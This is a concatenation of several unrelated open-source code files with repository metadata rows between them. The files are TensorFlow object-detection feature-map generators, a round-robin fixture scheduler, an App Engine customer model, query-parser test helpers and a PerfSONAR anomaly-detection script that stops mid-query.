# Only reload if the service is already reloaded
if reloaded and status:
yield formatter.format(name, 'reload')
# Always execute arbitrary commands as these may or may not rely on the service
# being up or down
if command:
yield formatter.format(name, command)
| mit | -6,873,257,825,784,884,000 | 31.75 | 83 | 0.529686 | false | 4.782961 | false | false | false |
derekjchow/models | research/object_detection/models/feature_map_generators.py | 1 | 25937 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions to generate a list of feature maps based on image features.
Provides several feature map generators that can be used to build object
detection feature extractors.
Object detection feature extractors usually are built by stacking two components
- A base feature extractor such as Inception V3 and a feature map generator.
Feature map generators build on the base feature extractors and produce a list
of final feature maps.
"""
import collections
import functools
import tensorflow as tf
from object_detection.utils import ops
slim = tf.contrib.slim
# Activation bound used for TPU v1. Activations will be clipped to
# [-ACTIVATION_BOUND, ACTIVATION_BOUND] when training with
# use_bounded_activations enabled.
ACTIVATION_BOUND = 6.0
def get_depth_fn(depth_multiplier, min_depth):
"""Builds a callable to compute depth (output channels) of conv filters.
Args:
depth_multiplier: a multiplier for the nominal depth.
min_depth: a lower bound on the depth of filters.
Returns:
A callable that takes in a nominal depth and returns the depth to use.
"""
def multiply_depth(depth):
new_depth = int(depth * depth_multiplier)
return max(new_depth, min_depth)
return multiply_depth
class KerasMultiResolutionFeatureMaps(tf.keras.Model):
"""Generates multi resolution feature maps from input image features.
A Keras model that generates multi-scale feature maps for detection as in the
SSD papers by Liu et al: https://arxiv.org/pdf/1512.02325v2.pdf, See Sec 2.1.
More specifically, when called on inputs it performs the following two tasks:
1) If a layer name is provided in the configuration, returns that layer as a
feature map.
2) If a layer name is left as an empty string, constructs a new feature map
based on the spatial shape and depth configuration. Note that the current
implementation only supports generating new layers using convolution of
stride 2 resulting in a spatial resolution reduction by a factor of 2.
By default convolution kernel size is set to 3, and it can be customized
by caller.
An example of the configuration for Inception V3:
{
'from_layer': ['Mixed_5d', 'Mixed_6e', 'Mixed_7c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
When this feature generator object is called on input image_features:
Args:
image_features: A dictionary of handles to activation tensors from the
base feature extractor.
Returns:
feature_maps: an OrderedDict mapping keys (feature map names) to
tensors where each tensor has shape [batch, height_i, width_i, depth_i].
"""
def __init__(self,
feature_map_layout,
depth_multiplier,
min_depth,
insert_1x1_conv,
is_training,
conv_hyperparams,
freeze_batchnorm,
name=None):
"""Constructor.
Args:
feature_map_layout: Dictionary of specifications for the feature map
layouts in the following format (Inception V2/V3 respectively):
{
'from_layer': ['Mixed_3c', 'Mixed_4c', 'Mixed_5c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
or
{
'from_layer': ['Mixed_5d', 'Mixed_6e', 'Mixed_7c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
If 'from_layer' is specified, the specified feature map is directly used
as a box predictor layer, and the layer_depth is directly infered from
the feature map (instead of using the provided 'layer_depth' parameter).
In this case, our convention is to set 'layer_depth' to -1 for clarity.
Otherwise, if 'from_layer' is an empty string, then the box predictor
layer will be built from the previous layer using convolution
operations. Note that the current implementation only supports
generating new layers using convolutions of stride 2 (resulting in a
spatial resolution reduction by a factor of 2), and will be extended to
a more flexible design. Convolution kernel size is set to 3 by default,
and can be customized by 'conv_kernel_size' parameter (similarily,
'conv_kernel_size' should be set to -1 if 'from_layer' is specified).
The created convolution operation will be a normal 2D convolution by
default, and a depthwise convolution followed by 1x1 convolution if
'use_depthwise' is set to True.
depth_multiplier: Depth multiplier for convolutional layers.
min_depth: Minimum depth for convolutional layers.
insert_1x1_conv: A boolean indicating whether an additional 1x1
convolution should be inserted before shrinking the feature map.
is_training: Indicates whether the feature generator is in training mode.
conv_hyperparams: A `hyperparams_builder.KerasLayerHyperparams` object
containing hyperparameters for convolution ops.
freeze_batchnorm: Bool. Whether to freeze batch norm parameters during
training or not. When training with a small batch size (e.g. 1), it is
desirable to freeze batch norm update and use pretrained batch norm
params.
name: A string name scope to assign to the model. If 'None', Keras
will auto-generate one from the class name.
"""
super(KerasMultiResolutionFeatureMaps, self).__init__(name=name)
self.feature_map_layout = feature_map_layout
self.convolutions = []
depth_fn = get_depth_fn(depth_multiplier, min_depth)
base_from_layer = ''
use_explicit_padding = False
if 'use_explicit_padding' in feature_map_layout:
use_explicit_padding = feature_map_layout['use_explicit_padding']
use_depthwise = False
if 'use_depthwise' in feature_map_layout:
use_depthwise = feature_map_layout['use_depthwise']
for index, from_layer in enumerate(feature_map_layout['from_layer']):
net = []
layer_depth = feature_map_layout['layer_depth'][index]
conv_kernel_size = 3
if 'conv_kernel_size' in feature_map_layout:
conv_kernel_size = feature_map_layout['conv_kernel_size'][index]
if from_layer:
base_from_layer = from_layer
else:
if insert_1x1_conv:
layer_name = '{}_1_Conv2d_{}_1x1_{}'.format(
base_from_layer, index, depth_fn(layer_depth / 2))
net.append(tf.keras.layers.Conv2D(depth_fn(layer_depth / 2),
[1, 1],
padding='SAME',
strides=1,
name=layer_name + '_conv',
**conv_hyperparams.params()))
net.append(
conv_hyperparams.build_batch_norm(
training=(is_training and not freeze_batchnorm),
name=layer_name + '_batchnorm'))
net.append(
conv_hyperparams.build_activation_layer(
name=layer_name))
layer_name = '{}_2_Conv2d_{}_{}x{}_s2_{}'.format(
base_from_layer, index, conv_kernel_size, conv_kernel_size,
depth_fn(layer_depth))
stride = 2
padding = 'SAME'
if use_explicit_padding:
padding = 'VALID'
# We define this function here while capturing the value of
# conv_kernel_size, to avoid holding a reference to the loop variable
# conv_kernel_size inside of a lambda function
def fixed_padding(features, kernel_size=conv_kernel_size):
return ops.fixed_padding(features, kernel_size)
net.append(tf.keras.layers.Lambda(fixed_padding))
# TODO(rathodv): Add some utilities to simplify the creation of
# Depthwise & non-depthwise convolutions w/ normalization & activations
if use_depthwise:
net.append(tf.keras.layers.DepthwiseConv2D(
[conv_kernel_size, conv_kernel_size],
depth_multiplier=1,
padding=padding,
strides=stride,
name=layer_name + '_depthwise_conv',
**conv_hyperparams.params()))
net.append(
conv_hyperparams.build_batch_norm(
training=(is_training and not freeze_batchnorm),
name=layer_name + '_depthwise_batchnorm'))
net.append(
conv_hyperparams.build_activation_layer(
name=layer_name + '_depthwise'))
net.append(tf.keras.layers.Conv2D(depth_fn(layer_depth), [1, 1],
padding='SAME',
strides=1,
name=layer_name + '_conv',
**conv_hyperparams.params()))
net.append(
conv_hyperparams.build_batch_norm(
training=(is_training and not freeze_batchnorm),
name=layer_name + '_batchnorm'))
net.append(
conv_hyperparams.build_activation_layer(
name=layer_name))
else:
net.append(tf.keras.layers.Conv2D(
depth_fn(layer_depth),
[conv_kernel_size, conv_kernel_size],
padding=padding,
strides=stride,
name=layer_name + '_conv',
**conv_hyperparams.params()))
net.append(
conv_hyperparams.build_batch_norm(
training=(is_training and not freeze_batchnorm),
name=layer_name + '_batchnorm'))
net.append(
conv_hyperparams.build_activation_layer(
name=layer_name))
# Until certain bugs are fixed in checkpointable lists,
# this net must be appended only once it's been filled with layers
self.convolutions.append(net)
def call(self, image_features):
"""Generate the multi-resolution feature maps.
Executed when calling the `.__call__` method on input.
Args:
image_features: A dictionary of handles to activation tensors from the
base feature extractor.
Returns:
feature_maps: an OrderedDict mapping keys (feature map names) to
tensors where each tensor has shape [batch, height_i, width_i, depth_i].
"""
feature_maps = []
feature_map_keys = []
for index, from_layer in enumerate(self.feature_map_layout['from_layer']):
if from_layer:
feature_map = image_features[from_layer]
feature_map_keys.append(from_layer)
else:
feature_map = feature_maps[-1]
for layer in self.convolutions[index]:
feature_map = layer(feature_map)
layer_name = self.convolutions[index][-1].name
feature_map_keys.append(layer_name)
feature_maps.append(feature_map)
return collections.OrderedDict(
[(x, y) for (x, y) in zip(feature_map_keys, feature_maps)])
def multi_resolution_feature_maps(feature_map_layout, depth_multiplier,
min_depth, insert_1x1_conv, image_features,
pool_residual=False):
"""Generates multi resolution feature maps from input image features.
Generates multi-scale feature maps for detection as in the SSD papers by
Liu et al: https://arxiv.org/pdf/1512.02325v2.pdf, See Sec 2.1.
More specifically, it performs the following two tasks:
1) If a layer name is provided in the configuration, returns that layer as a
feature map.
2) If a layer name is left as an empty string, constructs a new feature map
based on the spatial shape and depth configuration. Note that the current
implementation only supports generating new layers using convolution of
stride 2 resulting in a spatial resolution reduction by a factor of 2.
By default convolution kernel size is set to 3, and it can be customized
by caller.
An example of the configuration for Inception V3:
{
'from_layer': ['Mixed_5d', 'Mixed_6e', 'Mixed_7c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
Args:
feature_map_layout: Dictionary of specifications for the feature map
layouts in the following format (Inception V2/V3 respectively):
{
'from_layer': ['Mixed_3c', 'Mixed_4c', 'Mixed_5c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
or
{
'from_layer': ['Mixed_5d', 'Mixed_6e', 'Mixed_7c', '', '', ''],
'layer_depth': [-1, -1, -1, 512, 256, 128]
}
If 'from_layer' is specified, the specified feature map is directly used
as a box predictor layer, and the layer_depth is directly infered from the
feature map (instead of using the provided 'layer_depth' parameter). In
this case, our convention is to set 'layer_depth' to -1 for clarity.
Otherwise, if 'from_layer' is an empty string, then the box predictor
layer will be built from the previous layer using convolution operations.
Note that the current implementation only supports generating new layers
using convolutions of stride 2 (resulting in a spatial resolution
reduction by a factor of 2), and will be extended to a more flexible
design. Convolution kernel size is set to 3 by default, and can be
customized by 'conv_kernel_size' parameter (similarily, 'conv_kernel_size'
should be set to -1 if 'from_layer' is specified). The created convolution
operation will be a normal 2D convolution by default, and a depthwise
convolution followed by 1x1 convolution if 'use_depthwise' is set to True.
depth_multiplier: Depth multiplier for convolutional layers.
min_depth: Minimum depth for convolutional layers.
insert_1x1_conv: A boolean indicating whether an additional 1x1 convolution
should be inserted before shrinking the feature map.
image_features: A dictionary of handles to activation tensors from the
base feature extractor.
pool_residual: Whether to add an average pooling layer followed by a
residual connection between subsequent feature maps when the channel
depth match. For example, with option 'layer_depth': [-1, 512, 256, 256],
a pooling and residual layer is added between the third and forth feature
map. This option is better used with Weight Shared Convolution Box
Predictor when all feature maps have the same channel depth to encourage
more consistent features across multi-scale feature maps.
Returns:
feature_maps: an OrderedDict mapping keys (feature map names) to
tensors where each tensor has shape [batch, height_i, width_i, depth_i].
Raises:
ValueError: if the number entries in 'from_layer' and
'layer_depth' do not match.
ValueError: if the generated layer does not have the same resolution
as specified.
"""
depth_fn = get_depth_fn(depth_multiplier, min_depth)
feature_map_keys = []
feature_maps = []
base_from_layer = ''
use_explicit_padding = False
if 'use_explicit_padding' in feature_map_layout:
use_explicit_padding = feature_map_layout['use_explicit_padding']
use_depthwise = False
if 'use_depthwise' in feature_map_layout:
use_depthwise = feature_map_layout['use_depthwise']
for index, from_layer in enumerate(feature_map_layout['from_layer']):
layer_depth = feature_map_layout['layer_depth'][index]
conv_kernel_size = 3
if 'conv_kernel_size' in feature_map_layout:
conv_kernel_size = feature_map_layout['conv_kernel_size'][index]
if from_layer:
feature_map = image_features[from_layer]
base_from_layer = from_layer
feature_map_keys.append(from_layer)
else:
pre_layer = feature_maps[-1]
pre_layer_depth = pre_layer.get_shape().as_list()[3]
intermediate_layer = pre_layer
if insert_1x1_conv:
layer_name = '{}_1_Conv2d_{}_1x1_{}'.format(
base_from_layer, index, depth_fn(layer_depth / 2))
intermediate_layer = slim.conv2d(
pre_layer,
depth_fn(layer_depth / 2), [1, 1],
padding='SAME',
stride=1,
scope=layer_name)
layer_name = '{}_2_Conv2d_{}_{}x{}_s2_{}'.format(
base_from_layer, index, conv_kernel_size, conv_kernel_size,
depth_fn(layer_depth))
stride = 2
padding = 'SAME'
if use_explicit_padding:
padding = 'VALID'
intermediate_layer = ops.fixed_padding(
intermediate_layer, conv_kernel_size)
if use_depthwise:
feature_map = slim.separable_conv2d(
intermediate_layer,
None, [conv_kernel_size, conv_kernel_size],
depth_multiplier=1,
padding=padding,
stride=stride,
scope=layer_name + '_depthwise')
feature_map = slim.conv2d(
feature_map,
depth_fn(layer_depth), [1, 1],
padding='SAME',
stride=1,
scope=layer_name)
if pool_residual and pre_layer_depth == depth_fn(layer_depth):
feature_map += slim.avg_pool2d(
pre_layer, [3, 3],
padding='SAME',
stride=2,
scope=layer_name + '_pool')
else:
feature_map = slim.conv2d(
intermediate_layer,
depth_fn(layer_depth), [conv_kernel_size, conv_kernel_size],
padding=padding,
stride=stride,
scope=layer_name)
feature_map_keys.append(layer_name)
feature_maps.append(feature_map)
return collections.OrderedDict(
[(x, y) for (x, y) in zip(feature_map_keys, feature_maps)])
def fpn_top_down_feature_maps(image_features,
depth,
use_depthwise=False,
use_explicit_padding=False,
use_bounded_activations=False,
scope=None,
use_native_resize_op=False):
"""Generates `top-down` feature maps for Feature Pyramid Networks.
See https://arxiv.org/abs/1612.03144 for details.
Args:
image_features: list of tuples of (tensor_name, image_feature_tensor).
Spatial resolutions of succesive tensors must reduce exactly by a factor
of 2.
depth: depth of output feature maps.
use_depthwise: whether to use depthwise separable conv instead of regular
conv.
use_explicit_padding: whether to use explicit padding.
use_bounded_activations: Whether or not to clip activations to range
[-ACTIVATION_BOUND, ACTIVATION_BOUND]. Bounded activations better lend
themselves to quantized inference.
scope: A scope name to wrap this op under.
use_native_resize_op: If True, uses tf.image.resize_nearest_neighbor op for
the upsampling process instead of reshape and broadcasting implementation.
Returns:
feature_maps: an OrderedDict mapping keys (feature map names) to
tensors where each tensor has shape [batch, height_i, width_i, depth_i].
"""
with tf.name_scope(scope, 'top_down'):
num_levels = len(image_features)
output_feature_maps_list = []
output_feature_map_keys = []
padding = 'VALID' if use_explicit_padding else 'SAME'
kernel_size = 3
with slim.arg_scope(
[slim.conv2d, slim.separable_conv2d], padding=padding, stride=1):
top_down = slim.conv2d(
image_features[-1][1],
depth, [1, 1], activation_fn=None, normalizer_fn=None,
scope='projection_%d' % num_levels)
if use_bounded_activations:
top_down = tf.clip_by_value(top_down, -ACTIVATION_BOUND,
ACTIVATION_BOUND)
output_feature_maps_list.append(top_down)
output_feature_map_keys.append(
'top_down_%s' % image_features[-1][0])
for level in reversed(range(num_levels - 1)):
if use_native_resize_op:
with tf.name_scope('nearest_neighbor_upsampling'):
top_down_shape = top_down.shape.as_list()
top_down = tf.image.resize_nearest_neighbor(
top_down, [top_down_shape[1] * 2, top_down_shape[2] * 2])
else:
top_down = ops.nearest_neighbor_upsampling(top_down, scale=2)
residual = slim.conv2d(
image_features[level][1], depth, [1, 1],
activation_fn=None, normalizer_fn=None,
scope='projection_%d' % (level + 1))
if use_bounded_activations:
residual = tf.clip_by_value(residual, -ACTIVATION_BOUND,
ACTIVATION_BOUND)
if use_explicit_padding:
# slice top_down to the same shape as residual
residual_shape = tf.shape(residual)
top_down = top_down[:, :residual_shape[1], :residual_shape[2], :]
top_down += residual
if use_bounded_activations:
top_down = tf.clip_by_value(top_down, -ACTIVATION_BOUND,
ACTIVATION_BOUND)
if use_depthwise:
conv_op = functools.partial(slim.separable_conv2d, depth_multiplier=1)
else:
conv_op = slim.conv2d
if use_explicit_padding:
top_down = ops.fixed_padding(top_down, kernel_size)
output_feature_maps_list.append(conv_op(
top_down,
depth, [kernel_size, kernel_size],
scope='smoothing_%d' % (level + 1)))
output_feature_map_keys.append('top_down_%s' % image_features[level][0])
return collections.OrderedDict(reversed(
list(zip(output_feature_map_keys, output_feature_maps_list))))
def pooling_pyramid_feature_maps(base_feature_map_depth, num_layers,
image_features, replace_pool_with_conv=False):
"""Generates pooling pyramid feature maps.
The pooling pyramid feature maps is motivated by
multi_resolution_feature_maps. The main difference are that it is simpler and
reduces the number of free parameters.
More specifically:
- Instead of using convolutions to shrink the feature map, it uses max
pooling, therefore totally gets rid of the parameters in convolution.
- By pooling feature from larger map up to a single cell, it generates
features in the same feature space.
- Instead of independently making box predictions from individual maps, it
shares the same classifier across different feature maps, therefore reduces
the "mis-calibration" across different scales.
See go/ppn-detection for more details.
Args:
base_feature_map_depth: Depth of the base feature before the max pooling.
num_layers: Number of layers used to make predictions. They are pooled
from the base feature.
image_features: A dictionary of handles to activation tensors from the
feature extractor.
replace_pool_with_conv: Whether or not to replace pooling operations with
convolutions in the PPN. Default is False.
Returns:
feature_maps: an OrderedDict mapping keys (feature map names) to
tensors where each tensor has shape [batch, height_i, width_i, depth_i].
Raises:
ValueError: image_features does not contain exactly one entry
"""
if len(image_features) != 1:
raise ValueError('image_features should be a dictionary of length 1.')
image_features = image_features[image_features.keys()[0]]
feature_map_keys = []
feature_maps = []
feature_map_key = 'Base_Conv2d_1x1_%d' % base_feature_map_depth
if base_feature_map_depth > 0:
image_features = slim.conv2d(
image_features,
base_feature_map_depth,
[1, 1], # kernel size
padding='SAME', stride=1, scope=feature_map_key)
# Add a 1x1 max-pooling node (a no op node) immediately after the conv2d for
# TPU v1 compatibility. Without the following dummy op, TPU runtime
# compiler will combine the convolution with one max-pooling below into a
# single cycle, so getting the conv2d feature becomes impossible.
image_features = slim.max_pool2d(
image_features, [1, 1], padding='SAME', stride=1, scope=feature_map_key)
feature_map_keys.append(feature_map_key)
feature_maps.append(image_features)
feature_map = image_features
if replace_pool_with_conv:
with slim.arg_scope([slim.conv2d], padding='SAME', stride=2):
for i in range(num_layers - 1):
feature_map_key = 'Conv2d_{}_3x3_s2_{}'.format(i,
base_feature_map_depth)
feature_map = slim.conv2d(
feature_map, base_feature_map_depth, [3, 3], scope=feature_map_key)
feature_map_keys.append(feature_map_key)
feature_maps.append(feature_map)
else:
with slim.arg_scope([slim.max_pool2d], padding='SAME', stride=2):
for i in range(num_layers - 1):
feature_map_key = 'MaxPool2d_%d_2x2' % i
feature_map = slim.max_pool2d(
feature_map, [2, 2], padding='SAME', scope=feature_map_key)
feature_map_keys.append(feature_map_key)
feature_maps.append(feature_map)
return collections.OrderedDict(
[(x, y) for (x, y) in zip(feature_map_keys, feature_maps)])
| apache-2.0 | -2,083,562,005,663,669,000 | 43.488851 | 80 | 0.635309 | false | 4.039402 | true | false | false |
anttisalonen/freekick | src/freekick/gui/round_robin.py | 1 | 1369 | #!/usr/bin/python
import sys
def round_robin(ls):
clubs = list(ls)
num_clubs = len(clubs)
# add dummy club if necessary
if num_clubs % 2 == 1:
have_dummy = True
clubs.append(0)
num_clubs += 1
else:
have_dummy = False
# take last club as base
baseclub = clubs[-1]
clubs = clubs[:-1]
num_rounds = num_clubs - 1
half_clubs = num_clubs / 2
rounds = []
for r in range(num_rounds):
homeclubs = []
awayclubs = []
homeclubs.append(baseclub)
for i in range(half_clubs + 1):
homeclubs.append(clubs[i])
for i in range(num_clubs - 2, half_clubs - 2, -1):
awayclubs.append(clubs[i])
if r % 2 == 0:
rounds.append(zip(homeclubs, awayclubs))
else:
rounds.append(zip(awayclubs, homeclubs))
clubs.append(clubs.pop(0))
if have_dummy:
for matches in rounds:
del matches[0]
return rounds
if __name__ == "__main__":
default_num_clubs = 6
# parse command line
if len(sys.argv) > 1:
num_clubs = int(sys.argv[1])
else:
num_clubs = default_num_clubs
# generate clubs
clubs = range(1, num_clubs + 1)
rounds = round_robin(clubs)
print len(rounds)
for r in rounds:
print len(r),
print r
| agpl-3.0 | -9,599,687,282,898,360 | 20.390625 | 58 | 0.535427 | false | 3.221176 | false | false | false |
salomax/Open-Marketplace | app/customer/models.py | 3 | 6096 | #!/usr/bin/env python
# coding: utf-8
#
# Copyright 2016, Marcos Salomão.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import datetime
from app import user
from app import util
from app.exceptions import NotFoundEntityException
from app.exceptions import IntegrityViolationException
from app.marketplace import models as marketplace
from google.appengine.ext import ndb
from google.appengine.api import search as search_api
__author__ = "Marcos Salomão"
__email__ = "[email protected]"
__copyright__ = "Copyright 2016, Marcos Salomão"
__license__ = "Apache 2.0"
# Index autocomplete cliente
CUSTOMER_NAME_INDEX = 'customer_autocomplete_index'
AUTOCOMPLETE_SEARCH_LIMIT = 5
# Index usage
# http://stackoverflow.com/questions/12899083/partial-matching-gae-search-api
def get_name_index():
""" Customer index by name.
"""
return search_api.Index(name=CUSTOMER_NAME_INDEX)
class CustomerModel(ndb.Model):
""" Customer model.
"""
# Name
name = ndb.StringProperty(required=True)
# Email
email = ndb.StringProperty(required=False)
# Phone
phone = ndb.StringProperty(required=False)
# Location
location = ndb.StringProperty(required=False)
# Log date at insert moment
created_date = ndb.DateTimeProperty(auto_now_add=True)
def update_index(customer):
""" Update index by customer id.
"""
# Create partials
name = ','.join(util.tokenize_autocomplete(customer.name))
# Create a doc
document = search_api.Document(
doc_id=str(customer.key.id()),
fields=[search_api.TextField(name='name', value=name)])
# Add doc to index
get_name_index().put(document)
def remove_index(_id):
""" Remove index by id.
"""
# Delete
get_name_index().delete(str(_id))
def get_customer_query():
""" Get customer model query.
"""
# Get user marketplace
marketplaceModel = marketplace.get_marketplace()
# Get query, notice marketplace as parent
query = CustomerModel.query(ancestor=marketplaceModel.key)
# Return query
return query
def get(id):
""" Get customer by its id.
"""
# Get marketplace
marketplaceModel = marketplace.get_marketplace()
# Get customer by id, notice marketplace as parent
customer = ndb.Key('CustomerModel', int(
id), parent=marketplaceModel.key).get()
# Return customer
return customer
def list():
"""Listar os clientes cadastrados na loja do usuário.
"""
# Realizando query, listando os clientes
customers = get_customer_query().order(CustomerModel.name).fetch()
logging.debug("Foram selecionado(s) %d clientes(s) cadastrados",
len(customers))
# Retornando
return customers
def search(customer):
""" Search
"""
# Build search by name using index
search_results = get_name_index().search(search_api.Query(
query_string="name:{name}".format(name=customer.name),
options=search_api.QueryOptions(limit=AUTOCOMPLETE_SEARCH_LIMIT)))
# Transport results do model
results = []
for doc in search_results:
# Get customer model
customer = get(int(doc.doc_id))
# Handle if not exists
if customer is not None:
results.append(customer)
else:
remove_index(doc.doc_id)
logging.warning(
'Index %s is not up-to-date to doc %s and it has removed!',
CUSTOMER_NAME_INDEX, doc.doc_id)
# Return
return results
@ndb.transactional
def save(customer):
""" Add or update a customer in datastore.
"""
# Get marketplace
marketplaceModel = marketplace.get_marketplace()
logging.debug("Get user marketplace")
# Get customer model if exists
# or instantiate one, instead.
if customer.id is not None:
customerModel = CustomerModel(id=int(customer.id),
parent=marketplaceModel.key)
else:
customerModel = CustomerModel(parent=marketplaceModel.key)
logging.debug("Customer model created")
# Pass values
customerModel.name = customer.name
customerModel.email = customer.email
customerModel.phone = customer.phone
customerModel.location = customer.location
# Persist ir
customerModel.put()
logging.debug("Customer id %d saved success to %s",
customerModel.key.id(), marketplaceModel.name)
# Update index
update_index(customerModel)
logging.debug("Index updated to customer id %s",
customerModel.key.id())
# Return
return customerModel
@ndb.transactional
def delete(id):
""" Remove customer by id.
"""
# Get marketplace
marketplaceModel = marketplace.get_marketplace()
# Get customer
customerKey = ndb.Key('CustomerModel', int(id), parent=marketplaceModel.key)
# Handle if not exists
if customerKey is None:
raise NotFoundEntityException(message='messages.customer.notfound')
# Are there sales with this customer,
# if true, is not possible to delete
from app.sale import models as sales
if sales.has_sales_by_customer(customerKey) == True:
raise IntegrityViolationException(
message='messages.customer.salesintegrityviolation')
logging.debug("Check constraint validation OK")
# Remove from datastore
customerKey.delete()
logging.debug("Customer id %s removed success!", id)
# Update index
remove_index(id)
logging.debug("Index updated to customer id %s", id)
| apache-2.0 | 3,363,991,501,939,403,300 | 24.383333 | 80 | 0.673342 | false | 3.958415 | false | false | false |
nabin-info/hackerrank.com | points-on-rectangle.py | 1 | 1308 | #!/usr/bin/python
import sys
def corners(pts):
#x0,xN,y0,yN = [ pts[0][0], pts[0][0], pts[0][1], pts[0][1] ]
## determine our bounds
x0 = pts[0][0]
y0 = pts[0][1]
xN = pts[0][0]
yN = pts[0][1]
for pt in pts:
if pt[0] < x0: x0 = pt[0]
if pt[1] < y0: y0 = pt[1]
if pt[0] > xN: xN = pt[0]
if pt[1] > yN: yN = pt[1]
#print pt[0], pt[1]
print "Bounds: ", (x0,y0), (xN,yN)
for pt in pts:
x, y = pt
if x == x0 or x == xN:
if y >= y0 and y <= yN:
print pt, ":\tYES"
else:
print pt, ":\tNO"
elif y == y0 or y == yN:
if x >= x0 and x <= xN:
print pt, ":\tYES"
else:
print pt, ":\tNO"
else:
print pt, ":\tNO"
nqry = int(raw_input())
for q in range(nqry):
npts = int(raw_input())
pts = []
for p in range(npts):
x, y = map(int, str(raw_input()).split(" "))
pts += [ (x,y) ]
print "\n",pts
corners(pts)
#for i in [ '42536258796157867'\
# , '4424444424442444'\
# , '5424644424442444'\
# , '5122-2368-7954 - 3214'\
# , '44244x4424442444'\
# , '0525362587961578']:
# print i, ":\t", is_valid_cc(i)
| mit | 4,406,431,563,262,053,400 | 22.781818 | 65 | 0.419725 | false | 2.554688 | false | false | false |
aipescience/queryparser | src/queryparser/testing/__init__.py | 1 | 2934 | # -*- coding: utf-8 -*-
import pytest
from queryparser.adql import ADQLQueryTranslator
from queryparser.mysql import MySQLQueryProcessor
from queryparser.postgresql import PostgreSQLQueryProcessor
from queryparser.exceptions import QueryError, QuerySyntaxError
def _test_parsing(query_processor, test, translate=False):
if len(test) == 6:
query, columns, keywords, functions, display_columns, tables = test
replace_schema_name = None
elif len(test) == 7:
query, columns, keywords, functions, display_columns, tables,\
replace_schema_name = test
if translate:
adt = ADQLQueryTranslator()
adt.set_query(query)
if query_processor == MySQLQueryProcessor:
query = adt.to_mysql()
elif query_processor == PostgreSQLQueryProcessor:
query = adt.to_postgresql()
if replace_schema_name is None:
qp = query_processor(query)
else:
qp = query_processor()
qp.set_query(query)
qp.process_query(replace_schema_name=replace_schema_name)
qp_columns = ['.'.join([str(j) for j in i[:3]]) for i in qp.columns
if i[0] is not None and i[1] is not None]
qp_display_columns = ['%s: %s' % (str(i[0]),
'.'.join([str(j) for j in i[1]]))
for i in qp.display_columns]
qp_tables = ['.'.join([str(j) for j in i]) for i in qp.tables
if i[0] is not None and i[1] is not None]
if columns is not None:
assert set(columns) == set(qp_columns)
if keywords is not None:
assert set([i.lower() for i in keywords]) == set(qp.keywords)
if functions is not None:
assert set(functions) == set(qp.functions)
if display_columns is not None:
assert set(display_columns) == set(qp_display_columns)
if tables is not None:
assert set(tables) == set(qp_tables)
def _test_syntax(query_processor, query):
with pytest.raises(QuerySyntaxError):
query_processor(query)
def _test_query(query_processor, query):
with pytest.raises(QueryError):
query_processor(query)
def _test_adql_translation(test):
query, translated_query, output = test
adt = ADQLQueryTranslator(query)
if translated_query is not None:
if output == 'mysql':
assert translated_query.strip() == adt.to_mysql()
elif output == 'postgresql':
assert translated_query.strip() == adt.to_postgresql()
def _test_indexed_adql_translation(test):
query, translated_query, iob, output = test
adt = ADQLQueryTranslator(query)
if translated_query is not None:
if output == 'postgresql':
tq = adt.to_postgresql()
qp = PostgreSQLQueryProcessor()
qp.set_query(tq)
qp.process_query(indexed_objects=iob)
assert translated_query.strip() == qp.query
| apache-2.0 | 5,287,945,565,792,071,000 | 31.6 | 75 | 0.620314 | false | 3.771208 | true | false | false |
ivukotic/ML_platform_tests | PerfSONAR/AD_nn.py | 1 | 8494 | #!/usr/bin/env python3
from elasticsearch import Elasticsearch, exceptions as es_exceptions
from elasticsearch.helpers import scan
from time import time
import numpy as np
import pandas as pd
# import tensorflow as tf - should do it by itself
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout
from sklearn.model_selection import train_test_split
from pandas.tseries.offsets import *
# parameters. These should not change for one version (_type) of test.
alarm_index = 'ps_alarms'
alarm_type = 'NN v1'
ref = 24
sub = 1
ref = ref * Hour()
sub = sub * Hour()
# get a job from ES
# it takes one job earliest it time.
# it shouls also consider jobs that are "pending" but for too long.
es = Elasticsearch([{'host':'atlas-kibana.mwt2.org', 'port':9200}],timeout=60)
def getWorkload():
my_query = {
"size": 1,
"query":{
"bool":{
"must":[
{"term" : { "processed" : "no" }},
{"term" : { "_type" : alarm_type }}
]
}
},
"sort" : [
{"timestamp" : {"order" : "asc"}}
]
}
res = es.search(index=alarm_index, body=my_query, request_timeout=120)
#print(res)
hits = res['hits']['hits']
if len(hits)==0:
print('All done.')
return (0,0,0,1)
job_id = res['hits']['hits'][0]['_id']
job_source = res['hits']['hits'][0]['_source']
job_timestamp = job_source['timestamp']
site = job_source['site']
endpoint = job_source['endpoint']
print ('Processing id:',job_id, '\ttimebin:', job_timestamp, '\tsite:', site, '\tendpoint:', endpoint)
# setting a lock on the job
try:
es.update(index=alarm_index, doc_type=alarm_type, id=job_id, body={"doc": {"processed": "pending"}})
except es_exceptions.TransportError as e:
print ('TransportError ', e)
return (0,0,0,3)
# getting actual perfsonar data
end = pd.Timestamp(job_timestamp)
start = end - ref - sub
print('start:', start, '\tend:', end)
indices = "network_weather-2017.*"
my_query = {
'query': {
'bool':{
'must':[
{'range': {'timestamp': {'gte': start.strftime('%Y%m%dT%H%M00Z'), 'lt': end.strftime('%Y%m%dT%H%M00Z')}}},
{'bool':
{'should':[
{'term': {'src': endpoint}},
#{'term': {'src': srcSiteThroughputServer}},
